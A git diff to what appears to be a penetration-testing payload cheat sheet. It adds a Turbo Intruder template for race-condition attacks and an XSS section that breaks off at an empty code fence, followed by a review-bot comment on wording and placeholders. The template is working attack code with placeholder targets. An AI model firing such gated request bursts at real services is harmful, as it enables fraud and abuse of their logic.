diff --git a/Race Condition/README.md b/Race Condition/README.md index 2e70df8..1986c47 100644 --- a/Race Condition/README.md +++ b/Race Condition/README.md @@ -41,9 +41,40 @@ 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 4. Click "Attack" +## Turbo Intruder 2 Requests Examples +This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds. +```python +def queueRequests(target, wordlists): + engine = RequestEngine(endpoint=target.endpoint, + concurrentConnections=30, + requestsPerConnection=100, + pipeline=False + ) + request1 = ''' +POST /target-URI-1 HTTP/1.1 +Host: +Cookie: session= + +parameterName=parameterValue + ''' + + request2 = ''' +GET /target-URI-2 HTTP/1.1 +Host: +Cookie: session= + ''' + + engine.queue(request1, gate='race1') + for i in range(30): + engine.queue(request2, gate='race1') + engine.openGate('race1') + engine.complete(timeout=60) +def handleResponse(req, interesting): + table.add(req) +``` ## References * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) -* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) \ No newline at end of file +* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 5dee5d6..8309a2d 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
@@ -663,6 +663,12 @@ You can bypass a single quote with ' in an on mousedown event handler Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` http://www.geektools.com/cgi-bin/ipconv.cgi +```javascript +
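Review bot: In the Race Condition/README.md hunk, the sentence added under "## Turbo Intruder 2 Requests Examples" is hard to parse and has typos ("follwoing", "can use when use have to send race condition of request2"). Suggest rewording it along the lines of "The following template can be used when request2 has to be sent immediately after request1 and the race window may be only a few milliseconds." The `Host:` and `Cookie: session=` lines in both request1 and request2 are left empty, and `/target-URI-1`, `/target-URI-2` and `parameterName=parameterValue` are stand-ins, but nothing in the added text says these are placeholders the reader must fill in. One sentence before the code fence stating that would make the template self-explanatory. The new heading and the sentence also appear to run straight into the fence with no blank `+` line between them, unlike the existing "## References" section, so adding blank lines would keep the Markdown consistent.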